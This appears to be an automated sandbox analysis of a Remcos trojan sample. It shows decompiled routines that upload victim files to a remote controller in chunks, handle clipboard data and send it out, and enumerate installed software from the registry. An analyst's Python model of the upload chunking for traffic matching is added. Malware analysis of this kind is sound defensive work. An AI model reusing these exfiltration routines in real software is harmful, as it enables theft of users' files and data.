                                    				void* _t305;
                                    
                                    				_t278 = __edx;
                                    				_v68 = __ecx;
                                    				E006D498B(__ecx);
                                    				_t302 = _t301 - 0x10;
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsd");
                                    				_t299 = _v68;
                                    				E006D4A08(__edx);
                                    				_v28 = 0x186a0;
                                    				_v20 = 0;
                                    				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                    				_t310 = _t297 - 0xffffffff;
                                    				if(_t297 != 0xffffffff) {
                                    					_v80.LowPart = 0;
                                    					_v80.HighPart = 0;
                                    					__imp__GetFileSizeEx(_t297,  &_v80);
                                    					_t203 = _v80.HighPart;
                                    					_t117 = _v80;
                                    					_v48 = _t203;
                                    					_v32 = _t203;
                                    					_v52 = _t117;
                                    					_v16.LowPart = _t117;
                                    					E006D427F(0,  &_v112, _a4);
                                    					_t119 = E006E733B( &_v136,  &_v112);
                                    					_t303 = _t302 - 0x18;
                                    					_t280 = "Uploading file to Controller: ";
                                    					E006D75C2(0, _t303, _t280, _t297, __eflags, _t119);
                                    					_t304 = _t303 - 0x14;
                                    					E006D2084(0, _t304, "[Info]");
                                    					E006E6C80(0, _t297);
                                    					_t305 = _t304 + 0x30;
                                    					E006D1FC7();
                                    					E006D1EF0();
                                    					_v36 = 1;
                                    					_v40 = 0;
                                    					_t126 = E00720880(_v52, _v48, 0x186a0, 0);
                                    					_t210 = _t280;
                                    					asm("xorps xmm0, xmm0");
                                    					_v88 = _t126 + 1;
                                    					asm("adc ecx, ebx");
                                    					asm("movlpd [ebp-0x3c], xmm0");
                                    					_v84.LowPart = _t280;
                                    					__eflags = _v48;
                                    					if(__eflags < 0) {
                                    						L17:
                                    						CloseHandle(_t297);
                                    						E006D4E0B(_t299);
                                    						_t198 = 1;
                                    					} else {
                                    						if(__eflags > 0) {
                                    							L5:
                                    							_v44 = _v64.HighPart.LowPart;
                                    							_v64.HighPart.LowPart = _v64;
                                    							_t136 = 0x186a0;
                                    							goto L6;
                                    							do {
                                    								do {
                                    									L6:
                                    									_t281 = _v32;
                                    									__eflags = _v20 - _t281;
                                    									if(__eflags >= 0) {
                                    										_t210 = _v16.LowPart;
                                    										if(__eflags > 0) {
                                    											L9:
                                    											_t136 = _t210;
                                    											_v20 = _t281;
                                    											_v28 = _t136;
                                    										} else {
                                    											__eflags = _t136 - _t210;
                                    											if(__eflags > 0) {
                                    												goto L9;
                                    											}
                                    										}
                                    									}
                                    									_push(_t136);
                                    									_t137 = E006FF4C6(_t210, _t281, _t299, __eflags);
                                    									_push(0);
                                    									_v12 = _t137;
                                    									_v24 = 0;
                                    									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
                                    									__eflags = _t138;
                                    									if(_t138 == 0) {
                                    										_t306 = _t305 - 0x18;
                                    										_t216 = _t305 - 0x18;
                                    										_push("SetFilePointerEx error");
                                    										goto L23;
                                    									} else {
                                    										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
                                    										__eflags = _t148;
                                    										if(_t148 == 0) {
                                    											_t306 = _t305 - 0x18;
                                    											_t216 = _t305 - 0x18;
                                    											_push("ReadFile error");
                                    											L23:
                                    											E006D2084(0, _t216);
                                    											E006D2084(0, _t306 - 0x18, "[ERROR]");
                                    											E006E6C80(0, _t297);
                                    											E006FF4CF(_v12);
                                    											CloseHandle(_t297);
                                    											goto L24;
                                    										} else {
                                    											__eflags = _v24;
                                    											if(__eflags == 0) {
                                    												E006FF4CF(_v12);
                                    												CloseHandle(_t297);
                                    												E006D4E0B(_t299);
                                    												_t145 = 1;
                                    												goto L25;
                                    											} else {
                                    												E006D427F(0,  &_v112, _a4);
                                    												_t154 = E006D20AB(0,  &_v472, _t281, __eflags, _v12, _v24);
                                    												_t305 = _t305 - 0x18;
                                    												_t156 = E006E7260(0x73c238,  &_v448, _v88, _v84);
                                    												_t157 = E006E7260(0x73c238,  &_v424, _v36, _v40);
                                    												E006D2F1D(_t305, E006D2F93(0x73c238,  &_v136, E006D2F93(0x73c238,  &_v160, E006D2F93(0x73c238,  &_v184, E006D2F1D( &_v208, E006D2F93(0x73c238,  &_v232, E006D2F1D( &_v256, E006D2F93(0x73c238,  &_v280, E006D2F93(0x73c238,  &_v304, E006D2F93(0x73c238,  &_v328, E006D2F93(0x73c238,  &_v352, E006D2F93(0x73c238,  &_v376, E006E739C(0x73c238,  &_v400,  &_v112), __eflags, 0x73c238), __eflags,  &_a8), __eflags, 0x73c238), __eflags,  &_a32), __eflags, 0x73c238), _t157), __eflags, 0x73c238), _t156), __eflags, 0x73c238), __eflags,  &_a56), __eflags, 0x73c238), _t154);
                                    												_t299 = _v68;
                                    												_push(0x52);
                                    												_t173 = E006D4AA4(0x73c238, _v68, _t171, __eflags);
                                    												__eflags = _t173 - 0xffffffff;
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1FC7();
                                    												E006D1EF0();
                                    												__eflags = 0x73c200 | _t173 == 0xffffffff;
                                    												if((0x73c200 | _t173 == 0xffffffff) != 0) {
                                    													E006D4E0B(_t299);
                                    													CloseHandle(_t297);
                                    													E006FF4CF(_v12);
                                    													_t198 = 0;
                                    												} else {
                                    													goto L14;
                                    												}
                                    											}
                                    										}
                                    									}
                                    									goto L18;
                                    									L14:
                                    									E006FF4CF(_v12);
                                    									_t136 = _v28;
                                    									_v16.LowPart = _v16 - _t136;
                                    									_t295 = _v44;
                                    									asm("sbb ecx, [ebp-0x10]");
                                    									_v36 = _v36 + 1;
                                    									_push(0);
                                    									_pop(0);
                                    									asm("adc [ebp-0x24], ebx");
                                    									_t210 = _v64.HighPart.LowPart + _t136;
                                    									_v64.HighPart = _t210;
                                    									asm("adc edx, [ebp-0x10]");
                                    									_v44 = _t295;
                                    									__eflags = _t295 - _v48;
                                    								} while (__eflags < 0);
                                    								if(__eflags > 0) {
                                    									goto L17;
                                    								} else {
                                    									goto L16;
                                    								}
                                    								goto L18;
                                    								L16:
                                    								__eflags = _t210 - _v52;
                                    							} while (_t210 < _v52);
                                    							goto L17;
                                    						} else {
                                    							__eflags = _v52;
                                    							if(_v52 <= 0) {
                                    								goto L17;
                                    							} else {
                                    								goto L5;
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					E006D20EC(0, _t302 - 0x18, _t278, _t310,  &_a8);
                                    					_push(0x53);
                                    					E006D4AA4(0, 0x73c2e8, _t278, _t310);
                                    					L24:
                                    					E006D4E0B(_t299);
                                    					_t145 = 0;
                                    					L25:
                                    					_t198 = _t145;
                                    				}
                                    				L18:
                                    				E006D1FC7();
                                    				E006D1FC7();
                                    				E006D1FC7();
                                    				return _t198;
                                     			}

                                     			Instruction addresses: 0x006d64a2 to 0x006d6918 (per-line address column of the listing)

                                    APIs
                                      • Part of subcall function 006D4A08: connect.WS2_32(?,0073DBA0,00000010), ref: 006D4A23
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006D64ED
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 006D6524
                                    • __aulldiv.LIBCMT ref: 006D65A6
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 006D6614
                                    • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 006D662F
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                      • Part of subcall function 006D4E0B: closesocket.WS2_32(?), ref: 006D4E11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                     • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
                                    • API String ID: 1319223106-2190262076
                                    • Opcode ID: 2b68c66d0d134674f0cba69eba341e7c307b5ce2261552a9781c7c7e70663fb9
                                    • Instruction ID: d53ac5c0111a926e147d39159ced19ccef331593760e74661c233d66b4d3796e
                                    • Opcode Fuzzy Hash: 2b68c66d0d134674f0cba69eba341e7c307b5ce2261552a9781c7c7e70663fb9
                                    • Instruction Fuzzy Hash: CBC18B31D00219AFCB54EFA4DC929EEB7B6AF15310F10816EF415AA391EF345E45CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%
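The upload routine listed above opens the target file read-only, takes its size with GetFileSizeEx, then walks it in 0x186A0-byte (100000-byte) pieces: each ReadFile result is packed with the file name, a running chunk index that starts at 1 (_v36) and a declared total computed as __aulldiv(size, 0x186A0) + 1 (_v88), and handed to the send wrapper E006D4AA4 with command byte 0x52. The Python below is an added reconstruction of that chunk arithmetic for analysts who want to reason about the traffic; it is not code from the sample or from this report, the function names are my own, and the wire layout of the 0x52 message (field order, separators, the extra string arguments _a8/_a32/_a56) is deliberately not reconstructed. Note one property read straight from the listing: because the declared total is floor(size / chunk) + 1 while the read loop exits as soon as the offset reaches the file size, a file whose size is an exact multiple of 100000 declares one more chunk than the loop actually sends.

```python
"""Reconstruction of the chunking logic in the Remcos file-upload routine.

Constructed from the decompiled listing (CreateFileW / GetFileSizeEx /
SetFilePointerEx / ReadFile loop with a 0x186A0-byte buffer); this is an
analyst's model, not the malware's own source. Message framing is omitted.
"""

CHUNK_SIZE = 0x186A0  # 100000 bytes: _v28 and the ReadFile length argument


def declared_total_chunks(file_size: int) -> int:
    """Value the routine places in the message as the chunk total.

    Mirrors _v88 = __aulldiv(size, 0x186A0) + 1, i.e. floor division plus one,
    so an exact multiple of CHUNK_SIZE over-declares by one chunk.
    """
    if file_size < 0:
        raise ValueError("negative size")
    return file_size // CHUNK_SIZE + 1


def chunk_plan(file_size: int):
    """Return the (index, offset, length) triples the read loop would produce.

    Bookkeeping as in the listing: index starts at 1 (_v36), the read length is
    CHUNK_SIZE while at least that much remains, otherwise the remainder, and
    the loop runs while offset < size, so a zero-length file yields nothing
    (the routine returns 1 without sending anything in that case).
    """
    plan = []
    offset, remaining, index = 0, file_size, 1
    while offset < file_size:
        length = CHUNK_SIZE if remaining >= CHUNK_SIZE else remaining
        plan.append((index, offset, length))
        offset += length
        remaining -= length
        index += 1
    return plan


def split_upload(data: bytes):
    """Model the sequence of 0x52 messages for an in-memory file.

    Each element is (chunk_index, declared_total, payload). The real message
    also carries the file name and controller-supplied strings; those fields
    are not modelled here.
    """
    total = declared_total_chunks(len(data))
    return [(idx, total, data[off:off + length])
            for idx, off, length in chunk_plan(len(data))]


def reassemble(messages) -> bytes:
    """Controller-side view: order chunks by index and concatenate them.

    Ignores declared_total on purpose, since the listing shows it can exceed
    the number of chunks actually transmitted.
    """
    return b"".join(payload for _, _, payload in sorted(messages, key=lambda m: m[0]))


if __name__ == "__main__":
    # Constructed sample: 250000 bytes -> three chunks, declared total 3.
    sample = bytes(range(256)) * 977  # 250112 bytes, not an exact multiple
    msgs = split_upload(sample)
    print([(i, t, len(p)) for i, t, p in msgs])
    assert reassemble(msgs) == sample
    # Exact multiple: two chunks are sent, but the header declares three.
    exact = b"\x00" * (2 * CHUNK_SIZE)
    print(len(chunk_plan(len(exact))), declared_total_chunks(len(exact)))
```

When matching captured traffic against this model, treat the declared total as a hint rather than a terminator: a reassembler that waits for declared_total chunks will hang on files whose size is a multiple of 100000 bytes.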

                                    C-Code - Quality: 89%
                                    			E006E2CEE(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
                                    				void* __ebx;
                                    				int _t10;
                                    				void* _t20;
                                    				void* _t22;
                                    				void* _t31;
                                    				struct HWND__* _t38;
                                    				void* _t57;
                                    				void* _t61;
                                    				void* _t64;
                                    				void* _t66;
                                    
                                    				_t55 = __edx;
                                    				_t10 = OpenClipboard(_t38);
                                    				_t68 = _t10;
                                    				if(_t10 != 0) {
                                    					EmptyClipboard();
                                    					E006D1E49( &_a16, _t55, _t68, _t38);
                                    					_t57 = GlobalAlloc(0x2000, E006D2489() + 2);
                                    					_t20 = GlobalLock(_t57);
                                    					E006D1E49( &_a12, _t55, _t68, _t38);
                                    					_t22 = E006D2489();
                                    					E007024E0(_t20, E006D1F95(E006D1E49( &_a8, _t55, _t68, _t38)), _t22);
                                    					_t66 = _t64 + 0xc;
                                    					GlobalUnlock(_t57);
                                    					SetClipboardData(0xd, _t57);
                                    					CloseClipboard();
                                    					if(OpenClipboard(_t38) != 0) {
                                    						_t61 = GetClipboardData(0xd);
                                    						_t31 = GlobalLock(_t61);
                                    						GlobalUnlock(_t61);
                                    						CloseClipboard();
                                    						_t50 =  !=  ? _t31 : 0x72f724;
                                    						E006D427F(_t38,  &_a36,  !=  ? _t31 : 0x72f724);
                                    						_t55 =  &_a32;
                                    						E006E739C(_t38, _t66 - 0x18,  &_a32);
                                    						_push(0x6b);
                                    						E006D4AA4(_t38, 0x73c780,  &_a32, _t31);
                                    						E006D1EF0();
                                    					}
                                    				}
                                    				_t7 =  &_a16; // 0x6d4538
                                    				E006D1E74(_t7, _t55);
                                    				E006D1FC7();
                                    				E006D1FC7();
                                    				return 0;
                                     			}

                                     			Instruction addresses: 0x006e2cee to 0x006e33ed (per-line address column of the listing)

                                    APIs
                                    • OpenClipboard.USER32 ref: 006E2CEF
                                    • EmptyClipboard.USER32 ref: 006E2CFD
                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 006E2D1D
                                    • GlobalLock.KERNEL32 ref: 006E2D26
                                    • GlobalUnlock.KERNEL32(00000000), ref: 006E2D5C
                                    • SetClipboardData.USER32 ref: 006E2D65
                                    • CloseClipboard.USER32 ref: 006E2D82
                                    • OpenClipboard.USER32 ref: 006E2D89
                                    • GetClipboardData.USER32 ref: 006E2D99
                                    • GlobalLock.KERNEL32 ref: 006E2DA2
                                    • GlobalUnlock.KERNEL32(00000000), ref: 006E2DAB
                                    • CloseClipboard.USER32 ref: 006E2DB1
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                    • String ID: 8Em
                                    • API String ID: 3520204547-1798622111
                                    • Opcode ID: 465bf9d25217cccf9bff0dda1492fbcc6c96c80dc1cb6bf2ab265b4f4b71a26e
                                    • Instruction ID: 26629066750a10fd6b3ad2fde38cdc676442f225516d1eb2bd33153cdae62a0e
                                    • Opcode Fuzzy Hash: 465bf9d25217cccf9bff0dda1492fbcc6c96c80dc1cb6bf2ab265b4f4b71a26e
                                    • Instruction Fuzzy Hash: 00219A31904340ABD354BB71DC5E9BE77AAAF95701F00441EF902DA392DF7C8F058669
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 64%
                                    			E006E8E5A(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                    				struct tagPOINT _v12;
                                    				void* _t16;
                                    				struct HMENU__* _t17;
                                    				void* _t20;
                                    				void* _t24;
                                    
                                    				_t16 = _a8 - 1;
                                    				if(_t16 == 0) {
                                    					_t17 = CreatePopupMenu();
                                    					 *0x73beb8 = _t17;
                                    					AppendMenuA(_t17, 0, 0, "Close");
                                    					L15:
                                    					return 0;
                                    				}
                                    				_t20 = _t16 - 0x110;
                                    				if(_t20 == 0) {
                                    					if(_a12 != 0) {
                                    						goto L15;
                                    					}
                                    					Shell_NotifyIconA(2, 0x73bec0);
                                    					ExitProcess(0);
                                    				}
                                    				if(_t20 == 0x2f0) {
                                    					_t24 = _a16 - 0x201;
                                    					if(_t24 == 0) {
                                    						if(IsWindowVisible( *0x73bebc) == 0) {
                                    							ShowWindow( *0x73bebc, 9);
                                    							SetForegroundWindow( *0x73bebc);
                                    						} else {
                                    							ShowWindow( *0x73bebc, 0);
                                    						}
                                    						goto L15;
                                    					}
                                    					if(_t24 == 3) {
                                    						GetCursorPos( &_v12);
                                    						SetForegroundWindow(_a4);
                                    						TrackPopupMenu( *0x73beb8, 0, _v12, _v12.y, 0, _a4, 0);
                                    						goto L15;
                                    					}
                                    					_push(_a16);
                                    					_push(_a12);
                                    					_push(0x401);
                                    					L7:
                                    					return DefWindowProcA(_a4, ??, ??, ??);
                                    				}
                                    				_push(_a16);
                                    				_push(_a12);
                                    				_push(_a8);
                                    				goto L7;
                                    			}

                                    APIs
                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 006E8EA5
                                    • GetCursorPos.USER32(?), ref: 006E8EB4
                                    • SetForegroundWindow.USER32(?), ref: 006E8EBD
                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 006E8ED7
                                    • Shell_NotifyIconA.SHELL32(00000002,0073BEC0), ref: 006E8F28
                                    • ExitProcess.KERNEL32 ref: 006E8F30
                                    • CreatePopupMenu.USER32 ref: 006E8F36
                                    • AppendMenuA.USER32 ref: 006E8F4B
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                    • String ID: Close
                                    • API String ID: 1657328048-3535843008
                                    • Opcode ID: 955f3381277898c4c09b689098286033c7449ebe508ddbc88486d1571510331e
                                    • Instruction ID: 58455f39e35f348fcd926fb664c9d959d5ebbe86de61770d9fe09a72d3158116
                                    • Opcode Fuzzy Hash: 955f3381277898c4c09b689098286033c7449ebe508ddbc88486d1571510331e
                                    • Instruction Fuzzy Hash: D8213D31144249FFEF258FA5EC0DAAA3B77FB04302F008518F60995171CFB99E519B18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E0070F5AB(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                    				signed int _v8;
                                    				char _v21;
                                    				intOrPtr _v22;
                                    				struct _cpinfo _v28;
                                    				void* _v32;
                                    				void* _v36;
                                    				void* _v40;
                                    				intOrPtr* _v44;
                                    				signed int _v48;
                                    				void* _v52;
                                    				signed int* _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr* _v64;
                                    				signed int* _v68;
                                    				void* _v72;
                                    				char _v76;
                                    				signed int _t101;
                                    				signed int _t123;
                                    				signed short _t126;
                                    				void* _t130;
                                    				void* _t134;
                                    				void* _t137;
                                    				void* _t138;
                                    				intOrPtr _t139;
                                    				void* _t141;
                                    				signed int _t142;
                                    				intOrPtr* _t143;
                                    				signed char _t160;
                                    				signed char _t165;
                                    				signed int _t166;
                                    				void* _t168;
                                    				signed int _t170;
                                    				void* _t179;
                                    				signed int* _t180;
                                    				signed int* _t181;
                                    				signed int _t182;
                                    				signed char* _t189;
                                    				signed char* _t190;
                                    				signed int _t192;
                                    				void* _t193;
                                    				intOrPtr _t197;
                                    				short* _t209;
                                    				intOrPtr* _t211;
                                    				intOrPtr* _t215;
                                    				signed int _t216;
                                    				signed int _t217;
                                    				void* _t218;
                                    				void* _t219;
                                    
                                    				_t101 =  *0x73a00c; // 0x941617c6
                                    				_v8 = _t101 ^ _t217;
                                    				_t211 = _a4;
                                    				_t170 = 0;
                                    				_v64 = _t211;
                                    				_v32 = 0;
                                    				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
                                    				_v36 = 0;
                                    				_v40 = 0;
                                    				_v52 = 0;
                                    				_v76 = _t211;
                                    				_v72 = 0;
                                    				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
                                    					__eflags =  *(_t211 + 0x8c);
                                    					if( *(_t211 + 0x8c) != 0) {
                                    						asm("lock dec dword [eax]");
                                    					}
                                    					 *(_t211 + 0x8c) = _t170;
                                    					__eflags = 0;
                                    					 *(_t211 + 0x90) = _t170;
                                    					 *_t211 = 0x7277b8;
                                    					 *((intOrPtr*)(_t211 + 0x94)) = 0x727a38;
                                    					 *((intOrPtr*)(_t211 + 0x98)) = 0x727bb8;
                                    					 *((intOrPtr*)(_t211 + 4)) = 1;
                                    					L41:
                                    					return E006FFD1B(_v8 ^ _t217);
                                    				}
                                    				_t106 = _t211 + 8;
                                    				_v44 = 0;
                                    				if( *(_t211 + 8) != 0) {
                                    					L3:
                                    					_v44 = E0070F348(_t172, 1, 4);
                                    					E007101F5(_t170);
                                    					_v32 = E0070F348(_t172, 0x180, 2);
                                    					E007101F5(_t170);
                                    					_v36 = E0070F348(_t172, 0x180, 1);
                                    					E007101F5(_t170);
                                    					_v40 = E0070F348(_t172, 0x180, 1);
                                    					E007101F5(_t170);
                                    					_t197 = E0070F348(_t172, 0x101, 1);
                                    					_v52 = _t197;
                                    					E007101F5(_t170);
                                    					_t219 = _t218 + 0x3c;
                                    					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
                                    						L36:
                                    						E007101F5(_v44);
                                    						E007101F5(_v32);
                                    						E007101F5(_v36);
                                    						E007101F5(_v40);
                                    						_t170 = 1;
                                    						__eflags = 1;
                                    						goto L37;
                                    					} else {
                                    						_t123 = _t170;
                                    						do {
                                    							 *(_t123 + _t197) = _t123;
                                    							_t123 = _t123 + 1;
                                    						} while (_t123 < 0x100);
                                    						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
                                    							goto L36;
                                    						}
                                    						_t126 = _v28;
                                    						_t235 = _t126 - 5;
                                    						if(_t126 > 5) {
                                    							goto L36;
                                    						}
                                    						_t28 = _t197 + 1; // 0x1
                                    						_v48 = _t126 & 0x0000ffff;
                                    						_t192 = 0xff;
                                    						_t130 = E0071480C(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
                                    						_t219 = _t219 + 0x24;
                                    						_t236 = _t130;
                                    						if(_t130 == 0) {
                                    							goto L36;
                                    						}
                                    						_t34 = _t197 + 1; // 0x1
                                    						_t134 = E0071480C(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
                                    						_t219 = _t219 + 0x24;
                                    						if(_t134 == 0) {
                                    							goto L36;
                                    						}
                                    						if(_v48 <= 1 || _v22 == _t170) {
                                    							L22:
                                    							_v60 = _v32 + 0x100;
                                    							_t137 = E007193AC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
                                    							_t219 = _t219 + 0x1c;
                                    							if(_t137 == 0) {
                                    								goto L36;
                                    							}
                                    							_t193 = _v32;
                                    							_t138 = _t193 + 0xfe;
                                    							 *_t138 = 0;
                                    							_t179 = _v36;
                                    							_v32 = _t138;
                                    							_t139 = _v40;
                                    							 *(_t179 + 0x7f) = _t170;
                                    							_t180 = _t179 - 0xffffff80;
                                    							 *(_t139 + 0x7f) = _t170;
                                    							_v68 = _t180;
                                    							 *_t180 = _t170;
                                    							_t181 = _t139 + 0x80;
                                    							_v56 = _t181;
                                    							 *_t181 = _t170;
                                    							if(_v48 <= 1 || _v22 == _t170) {
                                    								L32:
                                    								_t182 = 0x3f;
                                    								memcpy(_t193, _t193 + 0x200, _t182 << 2);
                                    								_push(0x1f);
                                    								asm("movsw");
                                    								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                                    								_push(0x1f);
                                    								asm("movsw");
                                    								asm("movsb");
                                    								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
                                    								asm("movsw");
                                    								asm("movsb");
                                    								_t215 = _v64;
                                    								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
                                    									asm("lock xadd [ecx], eax");
                                    									if((_t142 | 0xffffffff) == 0) {
                                    										E007101F5( *(_t215 + 0x90) - 0xfe);
                                    										E007101F5( *(_t215 + 0x94) - 0x80);
                                    										E007101F5( *(_t215 + 0x98) - 0x80);
                                    										E007101F5( *((intOrPtr*)(_t215 + 0x8c)));
                                    									}
                                    								}
                                    								_t143 = _v44;
                                    								 *_t143 = 1;
                                    								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
                                    								 *_t215 = _v60;
                                    								 *(_t215 + 0x90) = _v32;
                                    								 *(_t215 + 0x94) = _v68;
                                    								 *(_t215 + 0x98) = _v56;
                                    								 *(_t215 + 4) = _v48;
                                    								L37:
                                    								E007101F5(_v52);
                                    								goto L41;
                                    							} else {
                                    								_t189 =  &_v21;
                                    								while(1) {
                                    									_t160 =  *_t189;
                                    									if(_t160 == 0) {
                                    										break;
                                    									}
                                    									_t216 =  *(_t189 - 1) & 0x000000ff;
                                    									if(_t216 > (_t160 & 0x000000ff)) {
                                    										L30:
                                    										_t189 =  &(_t189[2]);
                                    										if( *(_t189 - 1) != _t170) {
                                    											continue;
                                    										}
                                    										break;
                                    									}
                                    									_t209 = _t193 + 0x100 + _t216 * 2;
                                    									do {
                                    										_t216 = _t216 + 1;
                                    										 *_t209 = 0x8000;
                                    										_t209 = _t209 + 2;
                                    									} while (_t216 <= ( *_t189 & 0x000000ff));
                                    									goto L30;
                                    								}
                                    								goto L32;
                                    							}
                                    						} else {
                                    							_t190 =  &_v21;
                                    							while(1) {
                                    								_t165 =  *_t190;
                                    								if(_t165 == 0) {
                                    									goto L22;
                                    								}
                                    								_t192 =  *(_t190 - 1) & 0x000000ff;
                                    								_t166 = _t165 & 0x000000ff;
                                    								while(_t192 <= _t166) {
                                    									 *((char*)(_t192 + _t197)) = 0x20;
                                    									_t192 = _t192 + 1;
                                    									__eflags = _t192;
                                    									_t166 =  *_t190 & 0x000000ff;
                                    								}
                                    								_t190 =  &(_t190[2]);
                                    								_t242 =  *(_t190 - 1) - _t170;
                                    								if( *(_t190 - 1) != _t170) {
                                    									continue;
                                    								}
                                    								goto L22;
                                    							}
                                    							goto L22;
                                    						}
                                    					}
                                    				}
                                    				_t168 = E0071B0F4(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
                                    				_t219 = _t218 + 0x14;
                                    				if(_t168 != 0) {
                                    					goto L36;
                                    				}
                                    				goto L3;
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free$Info
                                    • String ID:
                                    • API String ID: 2509303402-0
                                    • Opcode ID: d9de9d37a81c9cd778f8a57a44993f542afde609fbb027abba27ed1a8e79a042
                                    • Instruction ID: 528267ccdad0940fd60f2a9f0cb4382ad672b9430d9d41addff7ec4051ed697d
                                    • Opcode Fuzzy Hash: d9de9d37a81c9cd778f8a57a44993f542afde609fbb027abba27ed1a8e79a042
                                    • Instruction Fuzzy Hash: 29B18F71900309EFDB219F78C885BEEBBF4BF08300F144179E595A76D2DB79A8859B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E006E7C05(void* __ebx, void* __ecx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				char _v16;
                                    				char _v40;
                                    				char _v64;
                                    				char _v88;
                                    				char _v112;
                                    				char _v136;
                                    				char _v160;
                                    				char _v184;
                                    				char _v208;
                                    				char _v232;
                                    				char _v256;
                                    				char _v280;
                                    				char _v304;
                                    				char _v328;
                                    				char _v352;
                                    				char _v376;
                                    				char _v400;
                                    				char _v424;
                                    				char _v448;
                                    				char _v472;
                                    				char _v1500;
                                    				void* __edi;
                                    				long _t72;
                                    				long _t78;
                                    				long _t206;
                                    				void* _t207;
                                    				intOrPtr* _t208;
                                    
                                    				_t129 = __ebx;
                                    				_t207 = __ecx;
                                    				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
                                    					_v16 = 0x400;
                                    					_t206 = 0;
                                    					E006D1F6D(__ebx,  &_v64);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push( &_v16);
                                    					_push( &_v1500);
                                    					_push(0);
                                    					while(1) {
                                    						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
                                    						__eflags = _t72 - 0x103;
                                    						if(__eflags == 0) {
                                    							break;
                                    						}
                                    						__eflags = _t72;
                                    						if(_t72 != 0) {
                                    							L8:
                                    							_t206 = _t206 + 1;
                                    							__eflags = _t206;
                                    							_v16 = 0x400;
                                    						} else {
                                    							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
                                    							__eflags = _t78;
                                    							if(_t78 == 0) {
                                    								E006E09BF( &_v40, _v8, L"DisplayName");
                                    								 *_t208 = L"Publisher";
                                    								E006E09BF( &_v184, _v8);
                                    								 *_t208 = L"DisplayVersion";
                                    								E006E09BF( &_v160, _v8);
                                    								 *_t208 = L"InstallLocation";
